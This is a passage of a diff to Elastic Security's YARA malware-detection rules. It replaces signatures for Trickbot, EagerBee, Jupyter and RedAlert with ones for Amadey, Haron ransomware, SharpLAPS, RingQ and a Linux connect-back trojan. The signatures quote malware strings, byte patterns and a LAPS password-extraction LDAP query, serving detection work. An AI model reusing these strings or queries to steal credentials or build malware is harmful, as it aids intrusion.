"23b75d6df9e2a7f8e1efee46ecaf1fc84247312b19a8a1941ddbca1b2ce5e1db" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2667c7181fb4db3f5765369fc2ec010b807a7bf6e2878fc42af410f036c61cbe" - threat_name = "Windows.Trojan.Trickbot" - severity = 80 + fingerprint = "686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "" ascii wide - $a2 = "" ascii wide - $a3 = "" ascii wide - $a4 = "" ascii wide + $a = { 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_Be718Af9 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Amadey_C4Df8D4A : FILE MEMORY { meta: - description = "Targets permadll module used to fingerprint BIOS/firmaware data" + description = "Detects Windows Trojan Amadey (Windows.Trojan.Amadey)" author = "Elastic Security" - id = "be718af9-5995-4ae2-ba55-504e88693c96" - date = "2021-03-30" + id = "c4df8d4a-01f4-466f-8225-7c7f462b29e7" + date = "2021-06-28" modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L898-L921" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c1f1bc58456cff7413d7234e348d47a8acfdc9d019ae7a4aba1afc1b3ed55ffa" - logic_hash = "d020f7d1637fc4ee3246e97c9acae0be1782e688154bd109f53f807211beebd7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Amadey.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2" + logic_hash = "7f96c4de585223033fb7e7906be6d6898651ecf30be51ed01abde18ef52c0e1e" score = 75 - quality = 25 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "047b1c64b8be17d4a6030ab2944ad715380f53a8a6dd9c8887f198693825a81d" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -83209,133 +83615,119 @@ rule ELASTIC_Windows_Trojan_Trickbot_Be718Af9 : FILE MEMORY os = "windows" strings: - $a1 = "user_platform_check.dll" ascii fullword - $a2 = "yes" ascii fullword - $a3 = "DDEADFDEEEEE" - $a4 = "\\`Ruuuuu_Exs|_" ascii fullword - $a5 = "\"%pueuu%" ascii fullword + $a1 = "D:\\Mktmp\\NL1\\Release\\NL1.pdb" fullword condition: - 3 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Trickbot_F8Dac4Bc : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Toshibabios_2891972A : FILE { meta: - description = "Targets rdpscan module used to bruteforce RDP" + description = "Name: NCHGBIOS2x64.SYS, Version: 4.2.4.0" author = "Elastic Security" - id = "f8dac4bc-2ea1-4733-a260-59f3cae2eba8" - date = "2021-03-30" - modified = "2021-08-23" + id = "2891972a-901d-47d3-ae73-39b7c601dd19" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L923-L954" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "13d102d546b9384f944f2a520ba32fb5606182bed45a8bba681e4374d7e5e322" - logic_hash = "d4536aac0ee402abcb87826e45c892d6f39562bc1e39b72ae8880dc077f230d9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_ToshibaBios.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073" + logic_hash = "c253181a754f421ee36ced994412672770497756848d78d557907957486e711b" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "256daf823f6296ae02103336817dec565129a11f37445b791b2f8e3163f0c17f" - threat_name = "Windows.Trojan.Trickbot" - severity = 100 + tags = "FILE" + fingerprint = "154a771873bef03d1cc63cb2e270a62d42bbd2aa9027a59bc027b3ff88641192" + threat_name = "Windows.VulnDriver.ToshibaBios" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = "rdpscan.dll" ascii fullword - $a2 = "F:\\rdpscan\\Bin\\Release_nologs\\" - $a3 = "Cookie: %s %s" wide fullword - $a4 = "<" - $a5 = "<" - $a6 = "X^Failed to create a list of contr" ascii fullword - $a7 = "rdp/domains" wide fullword - $a8 = "Your product name" wide fullword - $a9 = "rdp/over" wide fullword - $a10 = "rdp/freq" wide fullword - $a11 = "rdp/names" wide fullword - $a12 = "rdp/dict" wide fullword - $a13 = "rdp/mode" wide fullword + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4E 00 43 00 48 00 47 00 42 00 49 00 4F 00 53 00 32 00 78 00 36 00 34 00 2E 00 53 00 59 00 53 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x02][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x04][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x02][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x03][\x00-\x00]))/ condition: - 4 of ($a*) + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Windows_Trojan_Trickbot_9C0Fa8Fe : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Haron_A1C12E7E : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" - author = "Elastic Security" - id = "9c0fa8fe-8d5f-4581-87a0-92a4ed1b32b3" - date = "2021-07-13" - modified = "2021-08-23" + description = "Direct overlap with Thanos/Avaddon" + author = "Elastic Security" + id = "a1c12e7e-a740-4d26-a0ed-310a2b03fe50" + date = "2021-08-03" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L956-L974" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f528c3ea7138df7c661d88fafe56d118b6ee1d639868212378232ca09dc9bfad" - logic_hash = "23aebc3139c34ecd609db7920fa0d5e194173409e1862555e4c468dad6c46299" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Haron.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c" + logic_hash = "84df5a13495acee5dc2007cf1d6e1828a832d46fcbad2ca8676643fd47756248" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bd49ed2ee65ff0cfa95efc9887ed24de3882c5b5740d0efc6b9690454ca3f5dc" - severity = 100 + fingerprint = "c6abe96bd2848bb489f856373356dbad3fca273e9d71394ec22960070557ad11" + threat_name = "Windows.Ransomware.Haron" + severity = 90 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 74 19 48 85 FF 74 60 8B 46 08 39 47 08 76 6A 33 ED B1 01 B0 01 } + $a1 = { 00 04 28 0E 00 00 0A 06 FE 06 2A 00 00 06 73 0F 00 00 0A 28 } condition: - all of them + any of them } -rule ELASTIC_Windows_Trojan_Eagerbee_7029Ba21 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Haron_23B76Cb7 : FILE MEMORY { meta: - description = "Detects Windows Trojan Eagerbee (Windows.Trojan.EagerBee)" + description = "Direct overlap with Thanos/Avaddon" author = "Elastic Security" - id = "7029ba21-12ea-4120-911b-a36c4002409e" - date = "2023-05-09" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_EagerBee.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "09005775fc587ac7bf150c05352e59dc01008b7bf8c1d870d1cea87561aa0b06" - logic_hash = "874959361b14ba74e13e6e674da75c9bdb6b9475d8b286572825c940b41f679f" + id = "23b76cb7-6f96-4012-ad66-2e4e4ae744a9" + date = "2021-08-03" + modified = "2021-10-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Haron.yar#L22-L41" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c" + logic_hash = "e53c92be617444da0057680ee1ac45cbc1f707194281644bececa44e4ebe3580" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "26d0d10f7c503e284e2b24a9e273f880d2e152348dfdd44fb3fc8cb10aa57e2a" - severity = 100 + fingerprint = "9dc91a56ef17873f3e833d85fa947facde741d80a574ae911261e553a40a2731" + threat_name = "Windows.Ransomware.Haron" + severity = 90 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { C2 EB D6 0F B7 C2 48 8D 0C 80 41 8B 44 CB 14 41 2B 44 CB 0C 41 } - $a2 = { C8 75 04 33 C0 EB 7C 48 63 41 3C 8B 94 08 88 00 00 00 48 03 D1 8B } + $a1 = { 0A 28 06 00 00 06 26 DE 0A 08 2C 06 08 6F 48 00 00 0A DC DE } condition: - all of them + any of them } -rule ELASTIC_Windows_Trojan_Eagerbee_A64B323B : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharplaps_381C3F40 : FILE MEMORY { meta: - description = "Detects Windows Trojan Eagerbee (Windows.Trojan.EagerBee)" + description = "Detects Windows Hacktool Sharplaps (Windows.Hacktool.SharpLAPS)" author = "Elastic Security" - id = "a64b323b-60b6-49b9-99d2-82a336fe304e" - date = "2023-09-04" - modified = "2023-09-20" - reference = "https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_EagerBee.yar#L23-L45" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "339e4fdbccb65b0b06a1421c719300a8da844789a2016d58e8ce4227cb5dc91b" - logic_hash = "e1c25cf8ce0ff434727c9104c6b79110ff5cfa84eb3e939119fd05cf676727c6" + id = "381c3f40-b6c6-4e50-be28-3d34ba07b644" + date = "2022-12-22" + modified = "2022-12-22" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpLAPS.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ef0d508b3051fe6f99ba55202a17237f29fdbc0085e3f5c99b1aef52c8ebe425" + logic_hash = "d94f9e4200a63283346919c121873130ad90e4ad5979c017cb71dc0cc910a64a" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "5109ec213a2ac1a1d920f3a9753bed97d038b226775996002511df5dc0b6de9c" + fingerprint = "556b9ba9c0a2f08ff0b27e38e273f5817011de335436feb2a30cac74285d7e4f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -83343,31 +83735,35 @@ rule ELASTIC_Windows_Trojan_Eagerbee_A64B323B : FILE MEMORY os = "windows" strings: - $dexor_config_file = { 48 FF C0 8D 51 FF 44 30 00 49 03 C4 49 2B D4 ?? ?? 48 8D 4F 01 48 } - $parse_config = { 80 7C 14 20 3A ?? ?? ?? ?? ?? ?? 45 03 C4 49 03 D4 49 63 C0 48 3B C1 } - $parse_proxy1 = { 44 88 7C 24 31 44 88 7C 24 32 48 F7 D1 C6 44 24 33 70 C6 44 24 34 3D 88 5C 24 35 48 83 F9 01 } - $parse_proxy2 = { 33 C0 48 8D BC 24 F0 00 00 00 49 8B CE F2 AE 8B D3 48 F7 D1 48 83 E9 01 48 8B F9 } + $guid = "1e0986b4-4bf3-4cea-a885-347b6d232d46" ascii wide nocase + $str_name = "SharpLAPS.exe" ascii wide + $str0 = "Using the current session" ascii wide + $str1 = "Extracting LAPS password" ascii wide + $str2 = "(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=" ascii wide + $str4 = "Machine" ascii wide + $str5 = "sAMAccountName" ascii wide + $str6 = "ms-Mcs-AdmPwd" ascii wide condition: - 2 of them + $guid or 6 of ($str*) } -rule ELASTIC_Windows_Trojan_Jupyter_56152E31 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Ringq_B9715540 : FILE MEMORY { meta: - description = "Detects Windows Trojan Jupyter (Windows.Trojan.Jupyter)" + description = "Detects Windows Hacktool Ringq (Windows.Hacktool.RingQ)" author = "Elastic Security" - id = "56152e31-77c6-49fa-bbc5-c3630f11e633" - date = "2021-07-22" - modified = "2021-08-23" + id = "b9715540-77ae-4723-a29e-d4d88d626982" + date = "2024-06-28" + modified = "2024-07-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Jupyter.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ce486097ad2491aba8b1c120f6d0aa23eaf59cf698b57d2113faab696d03c601" - logic_hash = "7b32e9caca744f4f6b48aefa5fda111e6b7ac81a62dd1fb8873d2c800ac3c42b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_RingQ.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "450e01c32618cd4e4a327147896352ed1b34dca9fb28389dba450acf95f8b735" + logic_hash = "80d693c43a7026d28121e035ae875689512fd46d7f06c3f469b83d6fe707f36b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9cccc2e3d4cfe9ff090d02b143fa837f4da0c229426435b4e097f902e8c5fb01" + fingerprint = "f2a2d97b31cb648a6515dbf02a885a6afd434f38ed555c1e30296b7eb4550438" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -83375,31 +83771,34 @@ rule ELASTIC_Windows_Trojan_Jupyter_56152E31 : FILE MEMORY os = "windows" strings: - $a1 = "%appdata%\\solarmarker.dat" ascii fullword - $a2 = "\\AppData\\Roaming\\solarmarker.dat" wide fullword - $b1 = "steal_passwords" ascii fullword - $b2 = "jupyter" ascii fullword + $a1 = "Loading Dir main.txt ..." ascii fullword + $a2 = "Loading LocalFile ..." ascii fullword + $a3 = "No Find main,txt and StringTable ..." ascii fullword + $a4 = "https://github.com/T4y1oR/RingQ" + $a5 = "RingQ :)" ascii fullword + $a6 = "1. Create.exe fscan.exe" ascii fullword + $a7 = "C:/Users/username/Documents/file.txt" ascii fullword condition: - 1 of ($a*) or 2 of ($b*) + 2 of them } -rule ELASTIC_Linux_Ransomware_Redalert_39642D52 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Connectback_Bf194C93 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Redalert (Linux.Ransomware.RedAlert)" + description = "Detects Linux Trojan Connectback (Linux.Trojan.Connectback)" author = "Elastic Security" - id = "39642d52-0a4b-48d5-bb62-8f37beb4dc6a" - date = "2022-07-06" - modified = "2022-08-16" + id = "bf194c93-92d8-4eba-99c4-326a5ea76d0d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_RedAlert.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "039e1765de1cdec65ad5e49266ab794f8e5642adb0bdeb78d8c0b77e8b34ae09" - logic_hash = "fa8fc16f0c8a55dd78781d334d7f55db6aa5e60f76cebf5282150af8ceb08dc3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Connectback.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6784cb86460bddf1226f71f5f5361463cbda487f813d19cd88e8a4a1eb1a417b" + logic_hash = "148626e05caee4a2b2542726ea4e4dab074eeab0572a65fdbd32f5d96544daf8" score = 75 - quality = 48 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "744524ee2ae9e3e232f15b0576cdab836ac0fe3c9925eab66ed8c6b0be3f23d7" + fingerprint = "6e72b14be0a0a6e42813fa82ee77d057246ccba4774897b38acf2dc30c894023" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -83407,2651 +83806,2521 @@ rule ELASTIC_Linux_Ransomware_Redalert_39642D52 : FILE MEMORY os = "linux" strings: - $str_ransomnote = "\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\% REDALERT UNIQUE IDENTIFIER START \\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%\\%" ascii fullword - $str_print = "\t\t\t########\n\t\t\t[ N13V ]\n\t\t\t########\n\n" ascii fullword - $str_arg = "[info] Catch -t argument. Check encryption time" ascii fullword - $str_ext = ".crypt658" ascii fullword - $byte_checkvm = { 48 8B 14 DD ?? ?? ?? ?? 31 C0 48 83 C9 FF FC 48 89 EE 48 89 D7 F2 AE 4C 89 E7 48 F7 D1 E8 } + $a = { B6 0C B0 03 CD 80 85 C0 78 02 FF E1 B8 01 00 00 00 BB 01 00 } condition: - 3 of ($str_*) or ($byte_checkvm and $str_print) + all of them } -rule ELASTIC_Windows_Hacktool_Darkloadlibrary_C25Ee4Eb : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Bc6Ae28D : FILE MEMORY { meta: - description = "Detects Windows Hacktool Darkloadlibrary (Windows.Hacktool.DarkLoadLibrary)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c25ee4eb-8ea6-40e2-a1a3-ec60491ced03" - date = "2022-12-02" - modified = "2023-01-11" + id = "bc6ae28d-050b-43d9-ba57-82fb37a2bc91" + date = "2023-12-01" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_DarkLoadLibrary.yar#L1-L29" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5546194a71bc449789c3697f9c106860ac0a21e1ccf2b1196120b3f92f4b5306" - logic_hash = "c585abbe72834e9ba2e5f1c8070a43b0f10c2b574c72ffe1def4bfd431096415" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ce00873eb423c0259c18157a07bf7fd9b07333e528a5b9d48be79194310c9d97" + logic_hash = "0ca5ec945858a5238eac048520dea4597f706ad2c96be322d341c84c4ddbce33" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "a73ca4c615d3567c48cc9ec3eedb0497de67960e9610fd1d0ad136075005d10b" - severity = 100 + fingerprint = "40a45e5b109a9b48cecd95899ff6350af5d28deb1c6f3aa4f0363ed3abf62bf7" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $guid = "3DDD52BB-803A-40E7-90E4-A879A873DD8B" ascii wide nocase - $print_str0 = "LocalLdrGetProcedureAddress: failed to resolve address of: %s" ascii fullword - $print_str1 = "Not implemented yet, sorry" wide - $print_str2 = "Failed to link module to PEB: %s" ascii wide fullword - $print_str3 = "Failed to resolve imports: %s" ascii wide fullword - $print_str4 = "Failed to map sections: %s" ascii wide fullword - $print_str5 = "Failed to open local DLL file" wide fullword - $print_str6 = "Failed to get DLL file size" wide fullword - $print_str7 = "Failed to allocate memory for DLL data" wide fullword - $print_str8 = "Failed to read data from DLL file" wide fullword - $print_str9 = "Failed to close handle on DLL file" wide + $a = { 24 83 79 08 00 75 19 DD 01 8D 45 DC 50 51 51 DD 1C 24 E8 DB FC FF FF 85 C0 74 05 8B 45 F0 C9 C3 83 C8 FF C9 C3 55 8B EC 83 EC 24 83 79 08 00 75 19 DD 01 8D 45 DC 50 51 51 DD 1C } condition: - $guid or 4 of ($print_str*) + all of them } -rule ELASTIC_Windows_Ransomware_Akira_C8C298Ba : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Ce98C4Bc : FILE MEMORY { meta: - description = "Detects Windows Ransomware Akira (Windows.Ransomware.Akira)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c8c298ba-2760-4880-a54a-3d916049d0ab" - date = "2024-05-02" - modified = "2024-05-08" + id = "ce98c4bc-22bb-4c2b-bced-8fc36bd3a2f0" + date = "2023-12-17" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Akira.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a2df5477cf924bd41241a3326060cc2f913aff2379858b148ddec455e4da67bc" - logic_hash = "9058c83693e93f6daee8894453e56e0d9a4867d551ec3a6b66d7a517f65d8b07" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L21-L40" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "950e8a29f516ef3cf1a81501e97fbbbedb289ad9fb93352edb563f749378da35" + logic_hash = "74914f41c03cb2dcb1dc3175cc76574a0d40b66a1a3854af8f50c9858704b66b" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "81c6dfa172ce7f4254e3cc74fcb71786336d39438d6e9379f7611495f54227c9" - severity = 100 + fingerprint = "d0849208c71c1845a6319052474549dba8514ecf7efe6185c1af22ad151bdce7" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "akira_readme.txt" ascii fullword - $a2 = "Number of threads to encrypt = " ascii fullword - $a3 = "write_encrypt_info error:" ascii fullword - $a4 = "Log-%d-%m-%Y-%H-%M-%S" ascii fullword - $a5 = "--encryption_path" wide fullword - $a6 = "--encryption_percent" wide fullword + $a1 = { 4D 65 73 73 61 67 65 50 61 63 6B 4C 69 62 2E 4D 65 73 73 61 67 65 50 61 63 6B } + $a2 = { 43 6C 69 65 6E 74 2E 41 6C 67 6F 72 69 74 68 6D } condition: - 3 of them + all of them } -rule ELASTIC_Linux_Exploit_Abrox_5641Ba81 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_0Cc1481E : FILE MEMORY { meta: - description = "Detects Linux Exploit Abrox (Linux.Exploit.Abrox)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "5641ba81-2c37-4dd1-82d8-532182e8ed15" - date = "2021-04-06" - modified = "2021-09-16" + id = "0cc1481e-d666-4443-852c-679ef59e4ee4" + date = "2023-12-17" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Abrox.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8de96c8e61536cae870f4a24127d28b86bd8122428bf13965c596f92182625aa" - logic_hash = "29c894720c8d9134623427768ab1ab3d5e66fbeae86dd957f449d00091db9019" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L42-L60" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6ec7781e472a6827c1406a53ed4699407659bd57c33dd4ab51cabfe8ece6f23f" + logic_hash = "1a094cf337cb85aa4b7d1d2025571ab0661a7be1fd03d53d8c7370a90385f38c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d2abedb6182f86982ebe283215331ce238fda3964535047768f2ea55719b052f" - severity = 100 + fingerprint = "3dac71f8cbe7cb12066e91ffb6da6524891654fda249fa5934946fd5a2120360" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 04 58 CD 80 6A 17 58 31 DB CD 80 31 D2 52 68 2E } + $a1 = { 83 C4 A8 53 56 57 8B FA 8B D8 8B 43 28 3B 78 10 0F 84 B4 00 00 00 8B F0 85 FF 75 15 83 7E 04 01 75 0F 8B 46 10 E8 03 A7 FF FF 33 C0 89 46 10 EB 7C 8B C3 E8 B5 F3 FF FF 8B C3 E8 BE F3 } condition: all of them } -rule ELASTIC_Windows_Virus_Expiro_84E99Ff0 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_2507C37C : FILE MEMORY { meta: - description = "Detects Windows Virus Expiro (Windows.Virus.Expiro)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "84e99ff0-bff3-4a9c-93fb-504a32cbc44d" - date = "2023-09-26" - modified = "2023-11-02" + id = "2507c37c-a0ef-47e0-a02a-3e28f4655715" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Virus_Expiro.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "47107836ead700bddbe9e8a0c016b5b1443c785442b2addbb50a70445779bad7" - logic_hash = "ce4847bf5850c1f30dca9603bfbbfbb69339285f096ac469c6d2d4b04f5562b4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L62-L80" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "04296258f054a958f0fd013b3c6a3435280b28e9a27541463e6fc9afe30363cc" + logic_hash = "8c5ea1290260993ea5140baa4645f3fd0ebb4d43fce0e9a25f8e8948e683aec1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "843182cbbf7ff65699001f074972d584c65bdb1e1d76210b44cf6ba06830253c" - severity = 100 + fingerprint = "b20b76f19d21730b6e32d1468f0e14ee9d6f9f07b9692fb6dec76605d9b967e2" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" 